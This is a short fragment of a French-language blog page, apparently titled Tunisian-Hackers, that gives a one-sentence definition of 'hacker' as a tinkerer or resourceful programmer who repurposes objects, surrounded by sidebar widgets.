  • : Hacker est à l'origine un mot anglais signifiant bricoleur, bidouilleur, utilisé pour désigner en informatique les programmeurs astucieux et débrouillards. Plus généralement il désigne le possesseur d'une connaissance technique lui permettant de modifier un objet ou un mécanisme pour lui faire faire autre chose que ce qui était initialement prévu.
  • Contact

Translate this blog

English French German Spain Italian Dutch Russian Portuguese Japanese Korean Arabic Chinese Simplified


this widget by www.AllBlogTools.com

Recherche

Your IP Is:

 

Compteur Tunisian-Hackers

Liens